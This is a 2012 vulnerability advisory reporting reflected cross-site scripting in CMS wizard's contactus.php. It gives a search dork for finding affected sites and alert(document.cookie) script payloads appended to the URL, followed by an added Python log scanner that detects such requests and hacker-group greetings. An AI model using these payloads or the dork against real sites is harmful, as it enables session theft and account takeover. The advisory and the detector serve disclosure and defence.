CMS wizard Cross Site Scripting

2012-02-22T00:00:00
ID SECURITYVULNS:DOC:27694
Type securityvulns
Reporter Securityvulns
Modified 2012-02-22T00:00:00

Description

=================================================================
-=CMS wizard Cross Site Scripting
=================================================================

Author: XaDaL

Date: 14-02-2012

vendor: http://www.cmswizard.co.uk/

tested on: windows mobile

dork : powered by CMS wizard

This vulnerability affects /contactus.php.

The impact of this vulnerability

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

Attack details

URI was set to "><script>alert(document.cookie)</script>

or

           &quot;&gt;&lt;script&gt;alert&#40;/XaDaL_GantenG/&#41;&lt;/script&gt;

or other

=XSS=

http://localhost/contactus.php/"><script>alert(document.cookie)</script>

http://localhost/contactus.php/"><script>alert(/XaDaL_GantenG/)</script>
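
A defensive check built on the attack details above, added here as an example and not part of the original advisory: it scans web-server access logs for requests that append markup to /contactus.php. The log lines, client addresses and function names are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

SCRIPT = "/contactus.php"      # page named in the advisory
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"]')  # characters that have no place after the script name

# Constructed sample lines in common log format (not taken from the advisory).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Feb/2012:10:01:02 +0000] "GET /contactus.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Feb/2012:10:01:05 +0000] "GET /contactus.php/thanks HTTP/1.1" 200 5131',
    '203.0.113.9 - - [22/Feb/2012:10:02:11 +0000] "GET /contactus.php/%22%3E%3Cscript%3E'
    'alert(document.cookie)%3C/script%3E HTTP/1.1" 200 5342',
    '203.0.113.9 - - [22/Feb/2012:10:02:30 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 900',
]


def normalise(target, max_rounds=3):
    """Percent-decode until stable, then decode HTML entities."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return html.unescape(target)


def injected_suffix(target):
    """Return the decoded text after SCRIPT if it contains markup characters, else None."""
    decoded = normalise(target)
    start = decoded.lower().find(SCRIPT)
    if start < 0:
        return None
    suffix = decoded[start + len(SCRIPT):]
    return suffix if MARKUP.search(suffix) else None


def scan(lines):
    """Return (client address, decoded suffix) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        suffix = injected_suffix(match.group(1)) if match else None
        if suffix is not None:
            hits.append((line.split(" ", 1)[0], suffix))
    return hits


if __name__ == "__main__":
    for client, suffix in scan(SAMPLE_LOG):
        print(f"{client}: {suffix}")
```

Plain path info such as /contactus.php/thanks is not flagged; only a suffix that decodes to `<`, `>` or `"` is reported.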

!#GREETZ: kamtiez , 1bli3z , tukulesto , hakz , jundab ,boebefa ,ryan aby , albert wired ,dr.CruzZ xr0b0t , red r0b0t,El-Farhatz,s1do3l,virgi maho. and everyone else I can't mention one by one (o,0)v

all member magelangcyber , indonesiancoder , codenesia,kill-9,MC-crew.

and aya i love you full :*

Bogel & dicka cyber: let's grab coffee together again sometime, bro =))

Happy fvcklentine...

umbar-umbar titit hhhhhhhhhh :p